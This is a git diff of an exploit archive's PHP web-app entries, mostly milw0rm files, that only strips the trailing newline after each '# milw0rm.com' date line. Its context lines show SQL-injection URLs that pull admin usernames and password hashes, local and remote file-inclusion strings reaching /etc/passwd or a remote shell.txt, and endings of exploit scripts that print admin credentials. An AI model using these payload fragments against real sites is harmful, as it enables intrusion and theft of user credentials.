injection in this blog lol [*]---------------------------------------------------------- -# milw0rm.com [2008-03-11] +# milw0rm.com [2008-03-11] \ No newline at end of file diff --git a/platforms/php/webapps/5236.txt b/platforms/php/webapps/5236.txt index bcd602547..817059fc7 100755 --- a/platforms/php/webapps/5236.txt +++ b/platforms/php/webapps/5236.txt @@ -26,4 +26,4 @@ GREETZ: milw0rm.com, h4ck-y0u.org ! --==+ [phpBB MOD] FileBase SQL Injection Vulnerbilitys +==-- --==+================================================================================+==-- -# milw0rm.com [2008-03-11] +# milw0rm.com [2008-03-11] \ No newline at end of file diff --git a/platforms/php/webapps/5237.txt b/platforms/php/webapps/5237.txt index 9f7c7fd6c..d8eeb935a 100755 --- a/platforms/php/webapps/5237.txt +++ b/platforms/php/webapps/5237.txt @@ -39,4 +39,4 @@ index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/un 1.4 << as well. -# milw0rm.com [2008-03-11] +# milw0rm.com [2008-03-11] \ No newline at end of file diff --git a/platforms/php/webapps/5239.php b/platforms/php/webapps/5239.php index 0a89a5b05..7cfa46583 100755 --- a/platforms/php/webapps/5239.php +++ b/platforms/php/webapps/5239.php @@ -171,4 +171,4 @@ function status() { function getmicrotime() {return array_sum(explode(" ", microtime()));} ?> -# milw0rm.com [2008-03-11] +# milw0rm.com [2008-03-11] \ No newline at end of file diff --git a/platforms/php/webapps/5240.htm b/platforms/php/webapps/5240.htm index 8ccc8660c..2b8d12e04 100755 --- a/platforms/php/webapps/5240.htm +++ b/platforms/php/webapps/5240.htm @@ -86,4 +86,4 @@ function Main(substr, num) { -# milw0rm.com [2008-03-12] +# milw0rm.com [2008-03-12] \ No newline at end of file diff --git a/platforms/php/webapps/5241.txt b/platforms/php/webapps/5241.txt index d1f2bd790..55a0d048e 100755 --- a/platforms/php/webapps/5241.txt +++ b/platforms/php/webapps/5241.txt @@ -28,4 +28,4 @@ modules/gallery/index.php?do=showgall&gid=-9999999/**/union/**/select/**/0,1,con #####hackturkiye.hackturkiye@gmail.com##### ########################################### -# milw0rm.com [2008-03-12] +# milw0rm.com [2008-03-12] \ No newline at end of file diff --git a/platforms/php/webapps/5242.txt b/platforms/php/webapps/5242.txt index db955e748..aa30ad3cd 100755 --- a/platforms/php/webapps/5242.txt +++ b/platforms/php/webapps/5242.txt @@ -27,4 +27,4 @@ modules/my_egallery/index.php?do=showgall&gid=-9999999/**/union/**/select/**/0,1 #####hackturkiye.hackturkiye@gmail.com##### ########################################### -# milw0rm.com [2008-03-12] +# milw0rm.com [2008-03-12] \ No newline at end of file diff --git a/platforms/php/webapps/5243.txt b/platforms/php/webapps/5243.txt index e68b67b9c..9ff21adf0 100755 --- a/platforms/php/webapps/5243.txt +++ b/platforms/php/webapps/5243.txt @@ -23,4 +23,4 @@ kb.php?mode=article&k=-1+union+select+1,1,concat(user_id,char(58),username,char( www.1923turk.org turkish-warriorr@hotmail.com -# milw0rm.com [2008-03-12] +# milw0rm.com [2008-03-12] \ No newline at end of file diff --git a/platforms/php/webapps/5244.txt b/platforms/php/webapps/5244.txt index 67f024fd4..075d95912 100755 --- a/platforms/php/webapps/5244.txt +++ b/platforms/php/webapps/5244.txt @@ -28,4 +28,4 @@ viewcat.php?cid=-9999999/**/union/**/select/**/0,1,2,3,concat(uname,0x3a,pass),5 #####hackturkiye.hackturkiye@gmail.com##### ########################################### -# milw0rm.com [2008-03-12] +# milw0rm.com [2008-03-12] \ No newline at end of file diff --git a/platforms/php/webapps/5245.txt b/platforms/php/webapps/5245.txt index 5bb7264d4..195ae7db4 100755 --- a/platforms/php/webapps/5245.txt +++ b/platforms/php/webapps/5245.txt @@ -32,4 +32,4 @@ modules/tutorials/index.php?op=printpage&tid=-9999999/**/union/**/select/**/0,1, #####hackturkiye.hackturkiye@gmail.com##### ########################################### -# milw0rm.com [2008-03-12] +# milw0rm.com [2008-03-12] \ No newline at end of file diff --git a/platforms/php/webapps/5246.txt b/platforms/php/webapps/5246.txt index 3cb5a549a..635508815 100755 --- a/platforms/php/webapps/5246.txt +++ b/platforms/php/webapps/5246.txt @@ -37,4 +37,4 @@ --==+====================================================================================+==-- [+] [The End] -# milw0rm.com [2008-03-12] +# milw0rm.com [2008-03-12] \ No newline at end of file diff --git a/platforms/php/webapps/5247.txt b/platforms/php/webapps/5247.txt index acbb66d08..bfe5eb36e 100755 --- a/platforms/php/webapps/5247.txt +++ b/platforms/php/webapps/5247.txt @@ -37,4 +37,4 @@ --==+====================================================================================+==-- [+] [The End] -# milw0rm.com [2008-03-12] +# milw0rm.com [2008-03-12] \ No newline at end of file diff --git a/platforms/php/webapps/5252.txt b/platforms/php/webapps/5252.txt index 7fc231214..55e43a602 100755 --- a/platforms/php/webapps/5252.txt +++ b/platforms/php/webapps/5252.txt @@ -32,4 +32,4 @@ Version : 1.8 #####hackturkiye.hackturkiye@gmail.com##### ########################################### -# milw0rm.com [2008-03-14] +# milw0rm.com [2008-03-14] \ No newline at end of file diff --git a/platforms/php/webapps/5253.txt b/platforms/php/webapps/5253.txt index 6e5217dde..9a404bf63 100755 --- a/platforms/php/webapps/5253.txt +++ b/platforms/php/webapps/5253.txt @@ -33,4 +33,4 @@ Version :1.2 #####hackturkiye.hackturkiye@gmail.com##### ########################################### -# milw0rm.com [2008-03-14] +# milw0rm.com [2008-03-14] \ No newline at end of file diff --git a/platforms/php/webapps/5254.txt b/platforms/php/webapps/5254.txt index 1e1b635c6..e4d40416b 100755 --- a/platforms/php/webapps/5254.txt +++ b/platforms/php/webapps/5254.txt @@ -34,4 +34,4 @@ Version : 2.03 #####hackturkiye.hackturkiye@gmail.com##### ########################################### -# milw0rm.com [2008-03-14] +# milw0rm.com [2008-03-14] \ No newline at end of file diff --git a/platforms/php/webapps/5255.txt b/platforms/php/webapps/5255.txt index 57fcf660a..922e94545 100755 --- a/platforms/php/webapps/5255.txt +++ b/platforms/php/webapps/5255.txt @@ -33,4 +33,4 @@ Supported platforms : eXV2 #####hackturkiye.hackturkiye@gmail.com##### ########################################### -# milw0rm.com [2008-03-14] +# milw0rm.com [2008-03-14] \ No newline at end of file diff --git a/platforms/php/webapps/5256.pl b/platforms/php/webapps/5256.pl index 1192854a1..724e111f9 100755 --- a/platforms/php/webapps/5256.pl +++ b/platforms/php/webapps/5256.pl @@ -139,4 +139,4 @@ print "Admin username : $array[0]\n"; print "Admin password : $array[1]\n\n"; } -# milw0rm.com [2008-03-14] +# milw0rm.com [2008-03-14] \ No newline at end of file diff --git a/platforms/php/webapps/5260.txt b/platforms/php/webapps/5260.txt index 7a9edac1c..f96b16e9f 100755 --- a/platforms/php/webapps/5260.txt +++ b/platforms/php/webapps/5260.txt @@ -33,4 +33,4 @@ http://[HOST]/[PATH]/code/display.php?admindir=http://host/shell.txt? -# milw0rm.com [2008-03-14] +# milw0rm.com [2008-03-14] \ No newline at end of file diff --git a/platforms/php/webapps/5262.txt b/platforms/php/webapps/5262.txt index 6c65c891e..daf320c9c 100755 --- a/platforms/php/webapps/5262.txt +++ b/platforms/php/webapps/5262.txt @@ -37,4 +37,4 @@ --==+====================================================================================+==-- [+] [The End] -# milw0rm.com [2008-03-16] +# milw0rm.com [2008-03-16] \ No newline at end of file diff --git a/platforms/php/webapps/5263.txt b/platforms/php/webapps/5263.txt index 8d0e533cb..37be80624 100755 --- a/platforms/php/webapps/5263.txt +++ b/platforms/php/webapps/5263.txt @@ -48,4 +48,4 @@ http://[host]/[path]/index.php?function=banner_out&id=10000/**/LIMIT/**/0/**/UNI you will be redirect to http://[login]_[md5_hash_pass] (ex. http://admin_21232f297a57a5a743894a0e4a801fc3/) -# milw0rm.com [2008-03-16] +# milw0rm.com [2008-03-16] \ No newline at end of file diff --git a/platforms/php/webapps/5265.txt b/platforms/php/webapps/5265.txt index ac236b7b5..1dbc77aa4 100755 --- a/platforms/php/webapps/5265.txt +++ b/platforms/php/webapps/5265.txt @@ -14,4 +14,4 @@ POC : /Exero_CMS_1-0-1/themes/Default/news/fullview.php?theme=Local File %00 /Exero_CMS_1-0-1/themes/Default/nopermission.php?theme=Local File %00 -# milw0rm.com [2008-03-17] +# milw0rm.com [2008-03-17] \ No newline at end of file diff --git a/platforms/php/webapps/5266.txt b/platforms/php/webapps/5266.txt index de6ca589b..09b14e833 100755 --- a/platforms/php/webapps/5266.txt +++ b/platforms/php/webapps/5266.txt @@ -36,4 +36,4 @@ RxH Best Wishes -# milw0rm.com [2008-03-17] +# milw0rm.com [2008-03-17] \ No newline at end of file diff --git a/platforms/php/webapps/5267.txt b/platforms/php/webapps/5267.txt index c0f4b340e..3b65666b7 100755 --- a/platforms/php/webapps/5267.txt +++ b/platforms/php/webapps/5267.txt @@ -30,4 +30,4 @@ Dictionary Version 0.70 by nagl.ch #####hackturkiye.hackturkiye@gmail.com##### ########################################### -# milw0rm.com [2008-03-17] +# milw0rm.com [2008-03-17] \ No newline at end of file diff --git a/platforms/php/webapps/5273.txt b/platforms/php/webapps/5273.txt index 201caf128..8eec15cec 100755 --- a/platforms/php/webapps/5273.txt +++ b/platforms/php/webapps/5273.txt @@ -49,4 +49,4 @@ side note: Acajoom is a mailing lists, newsletters, auto-responders, and follow up tool to communication effectively with your users and customers. Your Communication partner! -# milw0rm.com [2008-03-18] +# milw0rm.com [2008-03-18] \ No newline at end of file diff --git a/platforms/php/webapps/5275.txt b/platforms/php/webapps/5275.txt index 532c432f8..5fd5bf7d0 100755 --- a/platforms/php/webapps/5275.txt +++ b/platforms/php/webapps/5275.txt @@ -20,4 +20,4 @@ [+] Example -1/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7/**/from/**/ecp_user/**/where/**/userid=1/* -# milw0rm.com [2008-03-18] +# milw0rm.com [2008-03-18] \ No newline at end of file diff --git a/platforms/php/webapps/5277.txt b/platforms/php/webapps/5277.txt index 4d8adedcc..e86b23d1b 100755 --- a/platforms/php/webapps/5277.txt +++ b/platforms/php/webapps/5277.txt @@ -55,4 +55,4 @@ side note: 1.2.2 joovideo! video manager semplificato per joomla!, versione commerciale -# milw0rm.com [2008-03-19] +# milw0rm.com [2008-03-19] \ No newline at end of file diff --git a/platforms/php/webapps/5278.txt b/platforms/php/webapps/5278.txt index 8babfa48c..ebe581345 100755 --- a/platforms/php/webapps/5278.txt +++ b/platforms/php/webapps/5278.txt @@ -58,4 +58,4 @@ side note: 2.1.3 Alberghi a fork of Accombo project original Author Niall McCullagh -# milw0rm.com [2008-03-19] +# milw0rm.com [2008-03-19] \ No newline at end of file diff --git a/platforms/php/webapps/5279.txt b/platforms/php/webapps/5279.txt index a8617f04f..6efc14910 100755 --- a/platforms/php/webapps/5279.txt +++ b/platforms/php/webapps/5279.txt @@ -52,4 +52,4 @@ side note: 1.4 Accombo is a Mambo accommodation advertising component. -# milw0rm.com [2008-03-19] +# milw0rm.com [2008-03-19] \ No newline at end of file diff --git a/platforms/php/webapps/5280.txt b/platforms/php/webapps/5280.txt index 60e1c1d54..50ab990bc 100755 --- a/platforms/php/webapps/5280.txt +++ b/platforms/php/webapps/5280.txt @@ -52,4 +52,4 @@ side note: 1.0 The structure of this component is based on the structure of the component Alberghi by Vamba -# milw0rm.com [2008-03-19] +# milw0rm.com [2008-03-19] \ No newline at end of file diff --git a/platforms/php/webapps/5281.php b/platforms/php/webapps/5281.php index 90da40412..1767bfa3c 100755 --- a/platforms/php/webapps/5281.php +++ b/platforms/php/webapps/5281.php @@ -950,4 +950,4 @@ class phpsploit ?> -# milw0rm.com [2008-03-19] +# milw0rm.com [2008-03-19] \ No newline at end of file diff --git a/platforms/php/webapps/5285.txt b/platforms/php/webapps/5285.txt index 86456c5de..c0d58a2d4 100755 --- a/platforms/php/webapps/5285.txt +++ b/platforms/php/webapps/5285.txt @@ -18,4 +18,4 @@ Alemin_Krali Says : Aynen katılıyorum (ne alaka ise a.q) Good. -# milw0rm.com [2008-03-20] +# milw0rm.com [2008-03-20] \ No newline at end of file diff --git a/platforms/php/webapps/5288.txt b/platforms/php/webapps/5288.txt index 1371f6356..0a23be5f8 100755 --- a/platforms/php/webapps/5288.txt +++ b/platforms/php/webapps/5288.txt @@ -26,4 +26,4 @@ Greetz: ... -# milw0rm.com [2008-03-21] +# milw0rm.com [2008-03-21] \ No newline at end of file diff --git a/platforms/php/webapps/5290.txt b/platforms/php/webapps/5290.txt index 9881f2d0f..f2ec7b31f 100755 --- a/platforms/php/webapps/5290.txt +++ b/platforms/php/webapps/5290.txt @@ -39,4 +39,4 @@ RunCMS Photo Version : 3.02 module. # ##http://my.opera.com/SQL-Injection/blog/## ########################################### -# milw0rm.com [2008-03-21] +# milw0rm.com [2008-03-21] \ No newline at end of file diff --git a/platforms/php/webapps/5291.txt b/platforms/php/webapps/5291.txt index af716f1c8..983be6a27 100755 --- a/platforms/php/webapps/5291.txt +++ b/platforms/php/webapps/5291.txt @@ -30,4 +30,4 @@ showCat.php?cat_id=-99999/**/union/**/select/**/0,concat(user_name,0x3a,password --http://my.opera.com/SQL-Injection/blog/-# ########################################### -# milw0rm.com [2008-03-21] +# milw0rm.com [2008-03-21] \ No newline at end of file diff --git a/platforms/php/webapps/5292.py b/platforms/php/webapps/5292.py index 26dc4edbb..aebd08591 100755 --- a/platforms/php/webapps/5292.py +++ b/platforms/php/webapps/5292.py @@ -242,4 +242,4 @@ while j <= 32: print "\n\n[+]All Done.\n-=Paradox Got This One=-" -# milw0rm.com [2008-03-21] +# milw0rm.com [2008-03-21] \ No newline at end of file diff --git a/platforms/php/webapps/5293.pl b/platforms/php/webapps/5293.pl index 15c7566e0..9dfd111bf 100755 --- a/platforms/php/webapps/5293.pl +++ b/platforms/php/webapps/5293.pl @@ -38,4 +38,4 @@ else { exit(); } -# milw0rm.com [2008-03-21] +# milw0rm.com [2008-03-21] \ No newline at end of file diff --git a/platforms/php/webapps/5294.txt b/platforms/php/webapps/5294.txt index ad42e1645..ea3b01c54 100755 --- a/platforms/php/webapps/5294.txt +++ b/platforms/php/webapps/5294.txt @@ -32,4 +32,4 @@ side note: www.sstreamtv.com 1.1 -# milw0rm.com [2008-03-22] +# milw0rm.com [2008-03-22] \ No newline at end of file diff --git a/platforms/php/webapps/5295.pl b/platforms/php/webapps/5295.pl index 5cd7543c4..7a2bdd6ba 100755 --- a/platforms/php/webapps/5295.pl +++ b/platforms/php/webapps/5295.pl @@ -49,4 +49,4 @@ sub getit($$) } } -# milw0rm.com [2008-03-22] +# milw0rm.com [2008-03-22] \ No newline at end of file diff --git a/platforms/php/webapps/5296.txt b/platforms/php/webapps/5296.txt index ec28437f1..cef0f9449 100755 --- a/platforms/php/webapps/5296.txt +++ b/platforms/php/webapps/5296.txt @@ -14,4 +14,4 @@ Siyasi tercihimiz ne olursa olsun Türkiye'nin geleceÄŸini karartmak isteyen www.kapatmayahayir.com ################################################# -# milw0rm.com [2008-03-22] +# milw0rm.com [2008-03-22] \ No newline at end of file diff --git a/platforms/php/webapps/5297.txt b/platforms/php/webapps/5297.txt index a36847aca..2a703ca00 100755 --- a/platforms/php/webapps/5297.txt +++ b/platforms/php/webapps/5297.txt @@ -33,4 +33,4 @@ side note: 1.0.0 This component allows careers to send their career info to databese! -# milw0rm.com [2008-03-23] +# milw0rm.com [2008-03-23] \ No newline at end of file diff --git a/platforms/php/webapps/5298.py b/platforms/php/webapps/5298.py index 0c299c11f..ac54fdd07 100755 --- a/platforms/php/webapps/5298.py +++ b/platforms/php/webapps/5298.py @@ -45,4 +45,4 @@ else: sys.exit(0) -# milw0rm.com [2008-03-23] +# milw0rm.com [2008-03-23] \ No newline at end of file diff --git a/platforms/php/webapps/5299.txt b/platforms/php/webapps/5299.txt index fb1910cbf..882b743c9 100755 --- a/platforms/php/webapps/5299.txt +++ b/platforms/php/webapps/5299.txt @@ -50,4 +50,4 @@ side note: Please send us your suggestions, comments and future requests for the Download3000 component. Thank you in advance.]]> -# milw0rm.com [2008-03-23] +# milw0rm.com [2008-03-23] \ No newline at end of file diff --git a/platforms/php/webapps/5300.txt b/platforms/php/webapps/5300.txt index 52b80ce56..d29752587 100755 --- a/platforms/php/webapps/5300.txt +++ b/platforms/php/webapps/5300.txt @@ -46,4 +46,4 @@ side note: 1.0 Componente Cinema per organizzare la tua videoteca. Componente realizzato sulla base di Akogallery -# milw0rm.com [2008-03-23] +# milw0rm.com [2008-03-23] \ No newline at end of file diff --git a/platforms/php/webapps/5301.txt b/platforms/php/webapps/5301.txt index f2fae4515..bbcf99b42 100755 --- a/platforms/php/webapps/5301.txt +++ b/platforms/php/webapps/5301.txt @@ -58,4 +58,4 @@ print "It is not vulnerable\n"; } } -# milw0rm.com [2008-03-24] +# milw0rm.com [2008-03-24] \ No newline at end of file diff --git a/platforms/php/webapps/5302.txt b/platforms/php/webapps/5302.txt index c74eb879b..01a04376f 100755 --- a/platforms/php/webapps/5302.txt +++ b/platforms/php/webapps/5302.txt @@ -62,4 +62,4 @@ Digital Security Research Group focuses on web application and database security and whitepapers posted regularly on our website. -# milw0rm.com [2008-03-24] +# milw0rm.com [2008-03-24] \ No newline at end of file diff --git a/platforms/php/webapps/5303.txt b/platforms/php/webapps/5303.txt index b1d85787a..3dbe29bcf 100755 --- a/platforms/php/webapps/5303.txt +++ b/platforms/php/webapps/5303.txt @@ -99,4 +99,4 @@ About Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. -# milw0rm.com [2008-03-24] +# milw0rm.com [2008-03-24] \ No newline at end of file diff --git a/platforms/php/webapps/5305.py b/platforms/php/webapps/5305.py index 757e2c61d..7baf6dee3 100755 --- a/platforms/php/webapps/5305.py +++ b/platforms/php/webapps/5305.py @@ -54,4 +54,4 @@ else: print "Exploit failed, sorry, go and find some new bug or check this code and fix it!" sys.exit(2) -# milw0rm.com [2008-03-24] +# milw0rm.com [2008-03-24] \ No newline at end of file diff --git a/platforms/php/webapps/5308.txt b/platforms/php/webapps/5308.txt index 36fcdcf61..a0458c057 100755 --- a/platforms/php/webapps/5308.txt +++ b/platforms/php/webapps/5308.txt @@ -52,4 +52,4 @@ http://target.com/e107_plugins/my_gallery/dload.php?file=dload.php File is downloaded as a .jpg file but the PHP source code can be retrieved using a text editor. -# milw0rm.com [2008-03-25] +# milw0rm.com [2008-03-25] \ No newline at end of file diff --git a/platforms/php/webapps/5309.txt b/platforms/php/webapps/5309.txt index dbadc9621..e05617958 100755 --- a/platforms/php/webapps/5309.txt +++ b/platforms/php/webapps/5309.txt @@ -133,4 +133,4 @@ Digital Security is leading IT security company in Russia, providing information Contact: research [at] dsec [dot] ru http://www.dsec.ru (in Russian) -# milw0rm.com [2008-03-25] +# milw0rm.com [2008-03-25] \ No newline at end of file diff --git a/platforms/php/webapps/5310.txt b/platforms/php/webapps/5310.txt index a24f72370..7874f2a8c 100755 --- a/platforms/php/webapps/5310.txt +++ b/platforms/php/webapps/5310.txt @@ -46,4 +46,4 @@ side note: 2.5.4 Directory component and alphabetical indexes for Mambo/Joomla's Content -# milw0rm.com [2008-03-25] +# milw0rm.com [2008-03-25] \ No newline at end of file diff --git a/platforms/php/webapps/5311.txt b/platforms/php/webapps/5311.txt index f248a73a1..ae8ad1617 100755 --- a/platforms/php/webapps/5311.txt +++ b/platforms/php/webapps/5311.txt @@ -65,4 +65,4 @@ # We can also try to get admin hash trought sql subqueries but the password is crypted into md5 2 times # and Admins don't use cookies in this CMS... -# milw0rm.com [2008-03-25] +# milw0rm.com [2008-03-25] \ No newline at end of file diff --git a/platforms/php/webapps/5312.txt b/platforms/php/webapps/5312.txt index bdb473d7b..c3738a2fd 100755 --- a/platforms/php/webapps/5312.txt +++ b/platforms/php/webapps/5312.txt @@ -42,4 +42,4 @@ PoC: [host]/[path]/mod.php?mod=account&to=../../[local file]%00 -# milw0rm.com [2008-03-25] +# milw0rm.com [2008-03-25] \ No newline at end of file diff --git a/platforms/php/webapps/5318.txt b/platforms/php/webapps/5318.txt index 6806aa422..bce52fa64 100755 --- a/platforms/php/webapps/5318.txt +++ b/platforms/php/webapps/5318.txt @@ -26,4 +26,4 @@ side note: 1.0 MyAlbum is practical,comfortable,fast simple a picture gallery component. -# milw0rm.com [2008-03-28] +# milw0rm.com [2008-03-28] \ No newline at end of file diff --git a/platforms/php/webapps/5319.pl b/platforms/php/webapps/5319.pl index b183bf4c8..c52ccf8cf 100755 --- a/platforms/php/webapps/5319.pl +++ b/platforms/php/webapps/5319.pl @@ -148,4 +148,4 @@ $postingkomen = $browser -> post( print $komen; print "[!]\n Exploit Gagal!!! ;)\n"; -# milw0rm.com [2008-03-28] +# milw0rm.com [2008-03-28] \ No newline at end of file diff --git a/platforms/php/webapps/5322.txt b/platforms/php/webapps/5322.txt index 67cc4e3eb..8da7c30a9 100755 --- a/platforms/php/webapps/5322.txt +++ b/platforms/php/webapps/5322.txt @@ -34,4 +34,4 @@ admin login on frontpage --http://my.opera.com/SQL-Injection/blog/-# ########################################### -# milw0rm.com [2008-03-30] +# milw0rm.com [2008-03-30] \ No newline at end of file diff --git a/platforms/php/webapps/5323.pl b/platforms/php/webapps/5323.pl index 4d4e5d536..3b77a0462 100755 --- a/platforms/php/webapps/5323.pl +++ b/platforms/php/webapps/5323.pl @@ -52,4 +52,4 @@ print " ".$recvd.""; exit; } -# milw0rm.com [2008-03-30] +# milw0rm.com [2008-03-30] \ No newline at end of file diff --git a/platforms/php/webapps/5324.txt b/platforms/php/webapps/5324.txt index f0b8b558a..ac88dae03 100755 --- a/platforms/php/webapps/5324.txt +++ b/platforms/php/webapps/5324.txt @@ -30,4 +30,4 @@ [~]--------------------------------------------------------------------------------------------------------------- [~] " Aklın Dünya Limanına Demir Atmışsa Gemin Fırtınadan Kurtulmaz ." -# milw0rm.com [2008-03-30] +# milw0rm.com [2008-03-30] \ No newline at end of file diff --git a/platforms/php/webapps/5325.txt b/platforms/php/webapps/5325.txt index 9b2ba8303..d94a88470 100755 --- a/platforms/php/webapps/5325.txt +++ b/platforms/php/webapps/5325.txt @@ -54,4 +54,4 @@ http://www.jshopecommerce.com/v2demo/page.php?xPage=../../../../../../../../../. ########################################## -# milw0rm.com [2008-03-30] +# milw0rm.com [2008-03-30] \ No newline at end of file diff --git a/platforms/php/webapps/5326.txt b/platforms/php/webapps/5326.txt index a4b4d1dfa..642fe7620 100755 --- a/platforms/php/webapps/5326.txt +++ b/platforms/php/webapps/5326.txt @@ -21,4 +21,4 @@ null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/w # Greetz: ZioN, b!g B0$$, h4cky0u.org ################################################################ -# milw0rm.com [2008-03-31] +# milw0rm.com [2008-03-31] \ No newline at end of file diff --git a/platforms/php/webapps/5328.txt b/platforms/php/webapps/5328.txt index 332d2b78f..7266ffff1 100755 --- a/platforms/php/webapps/5328.txt +++ b/platforms/php/webapps/5328.txt @@ -17,4 +17,4 @@ POC : /phpspammanager.0.53.dev/body.php?filename=../../../../../../../../etc/passwd I'm Mahmood_ali --- I'm Tryagi -# milw0rm.com [2008-03-31] +# milw0rm.com [2008-03-31] \ No newline at end of file diff --git a/platforms/php/webapps/5329.txt b/platforms/php/webapps/5329.txt index 79386dc2c..bbabd5e47 100755 --- a/platforms/php/webapps/5329.txt +++ b/platforms/php/webapps/5329.txt @@ -28,4 +28,4 @@ ####################### ####################### -# milw0rm.com [2008-03-31] +# milw0rm.com [2008-03-31] \ No newline at end of file diff --git a/platforms/php/webapps/5331.pl b/platforms/php/webapps/5331.pl index 96ae8f31b..de752fdfc 100755 --- a/platforms/php/webapps/5331.pl +++ b/platforms/php/webapps/5331.pl @@ -117,4 +117,4 @@ print " print "\n\nExploiting...\n"; Exploit(); -# milw0rm.com [2008-03-31] +# milw0rm.com [2008-03-31] \ No newline at end of file diff --git a/platforms/php/webapps/5333.txt b/platforms/php/webapps/5333.txt index 4780bd486..54c12a33e 100755 --- a/platforms/php/webapps/5333.txt +++ b/platforms/php/webapps/5333.txt @@ -126,4 +126,4 @@ print " print "\n\nExploiting...\n"; Exploit(); -# milw0rm.com [2008-04-01] +# milw0rm.com [2008-04-01] \ No newline at end of file diff --git a/platforms/php/webapps/5334.txt b/platforms/php/webapps/5334.txt index d1fc4dc7a..9e6cad704 100755 --- a/platforms/php/webapps/5334.txt +++ b/platforms/php/webapps/5334.txt @@ -19,4 +19,4 @@ # Tnx God # ##################################################################################### -# milw0rm.com [2008-04-01] +# milw0rm.com [2008-04-01] \ No newline at end of file diff --git a/platforms/php/webapps/5335.txt b/platforms/php/webapps/5335.txt index df543c5f2..e0fb0c54b 100755 --- a/platforms/php/webapps/5335.txt +++ b/platforms/php/webapps/5335.txt @@ -45,4 +45,4 @@ side note: 1.51 Kerfi �tla� til a� kynna v�rur og v�ruflokka eftir ver�um -# milw0rm.com [2008-04-01] +# milw0rm.com [2008-04-01] \ No newline at end of file diff --git a/platforms/php/webapps/5336.pl b/platforms/php/webapps/5336.pl index 7c6485703..bc016a96b 100755 --- a/platforms/php/webapps/5336.pl +++ b/platforms/php/webapps/5336.pl @@ -166,4 +166,4 @@ sub info $| = 1; } -# milw0rm.com [2008-04-01] +# milw0rm.com [2008-04-01] \ No newline at end of file diff --git a/platforms/php/webapps/5337.txt b/platforms/php/webapps/5337.txt index 03a572a13..4265dd994 100755 --- a/platforms/php/webapps/5337.txt +++ b/platforms/php/webapps/5337.txt @@ -38,4 +38,4 @@ side note: 1.0 Composant pour la gestion des actualites de la CAF -# milw0rm.com [2008-04-01] +# milw0rm.com [2008-04-01] \ No newline at end of file diff --git a/platforms/php/webapps/5339.php b/platforms/php/webapps/5339.php index 9c7407f37..eb453a72d 100755 --- a/platforms/php/webapps/5339.php +++ b/platforms/php/webapps/5339.php @@ -1062,4 +1062,4 @@ class phpsploit { } ?> -# milw0rm.com [2008-04-01] +# milw0rm.com [2008-04-01] \ No newline at end of file diff --git a/platforms/php/webapps/5340.txt b/platforms/php/webapps/5340.txt index eae14914b..55ef92327 100755 --- a/platforms/php/webapps/5340.txt +++ b/platforms/php/webapps/5340.txt @@ -26,4 +26,4 @@ [~] Sql 2 : [~] -99999/**/union/**/select/**/0,uname/**/from/**/runcms_users/* -# milw0rm.com [2008-04-01] +# milw0rm.com [2008-04-01] \ No newline at end of file diff --git a/platforms/php/webapps/5345.txt b/platforms/php/webapps/5345.txt index 6dd0b78a5..b844a0766 100755 --- a/platforms/php/webapps/5345.txt +++ b/platforms/php/webapps/5345.txt @@ -32,4 +32,4 @@ | | \==============================================================================================================/ -# milw0rm.com [2008-04-02] +# milw0rm.com [2008-04-02] \ No newline at end of file diff --git a/platforms/php/webapps/5347.txt b/platforms/php/webapps/5347.txt index becf34f8d..c6fb2b94d 100755 --- a/platforms/php/webapps/5347.txt +++ b/platforms/php/webapps/5347.txt @@ -6,4 +6,4 @@ Vul Code[Example] : http://[site]/[Path]/makepost.php?prefixdir=../../../../../. Error : include "./".$prefixdir."/DaZPHPNews-0.1-1/makepost.php"; Greetz : Kezzap66345 - Str0ke - Dread 35 -# milw0rm.com [2008-04-02] +# milw0rm.com [2008-04-02] \ No newline at end of file diff --git a/platforms/php/webapps/5348.txt b/platforms/php/webapps/5348.txt index c6537726f..0490842ff 100755 --- a/platforms/php/webapps/5348.txt +++ b/platforms/php/webapps/5348.txt @@ -8,4 +8,4 @@ Vul Code : http://[site]/[Path]/modules/basicfog/basicfogfactory.class.php?PATH_ Greetz : Kezzap66345 - Str0ke - Dread 35 -# milw0rm.com [2008-04-02] +# milw0rm.com [2008-04-02] \ No newline at end of file diff --git a/platforms/php/webapps/5350.txt b/platforms/php/webapps/5350.txt index 84a844200..044715c26 100755 --- a/platforms/php/webapps/5350.txt +++ b/platforms/php/webapps/5350.txt @@ -30,4 +30,4 @@ index.php?mod=galerie&action=gal&id_gal=-99999/**/union/**/select/**/0,1,concat( --http://my.opera.com/SQL-Injection/blog/-# ########################################### -# milw0rm.com [2008-04-03] +# milw0rm.com [2008-04-03] \ No newline at end of file diff --git a/platforms/php/webapps/5351.txt b/platforms/php/webapps/5351.txt index a75b4efc0..9d4b990f3 100755 --- a/platforms/php/webapps/5351.txt +++ b/platforms/php/webapps/5351.txt @@ -39,4 +39,4 @@ index.php?mod=archives&ac=voir&id=-99999/**/union/**/select/**/0,concat(pseudo,0 --http://my.opera.com/SQL-Injection/blog/-# ########################################### -# milw0rm.com [2008-04-03] +# milw0rm.com [2008-04-03] \ No newline at end of file diff --git a/platforms/php/webapps/5352.txt b/platforms/php/webapps/5352.txt index 34d1292c0..8c63ac594 100755 --- a/platforms/php/webapps/5352.txt +++ b/platforms/php/webapps/5352.txt @@ -19,4 +19,4 @@ http://server.com/Path/index.php?mod=jeuxflash&cat=-1%20union%20select%201,conca H-T Team { HouSSaMiX _ ToXiC350 } ######################################################################### -# milw0rm.com [2008-04-03] +# milw0rm.com [2008-04-03] \ No newline at end of file diff --git a/platforms/php/webapps/5353.txt b/platforms/php/webapps/5353.txt index 06ca48af8..b2edd7a42 100755 --- a/platforms/php/webapps/5353.txt +++ b/platforms/php/webapps/5353.txt @@ -20,4 +20,4 @@ http://server.com/Path/index.php?mod=ConcoursPhoto&VIEW=prix&C_ID=-1/**/union/** Stack-Terrorist [v40] ######################################################################### -# milw0rm.com [2008-04-03] +# milw0rm.com [2008-04-03] \ No newline at end of file diff --git a/platforms/php/webapps/5358.pl b/platforms/php/webapps/5358.pl index 34fdf55e7..288e90763 100755 --- a/platforms/php/webapps/5358.pl +++ b/platforms/php/webapps/5358.pl @@ -61,4 +61,4 @@ if($response->is_success()) { } else { print "Check username/password!"; exit; } exit; -# milw0rm.com [2008-04-04] +# milw0rm.com 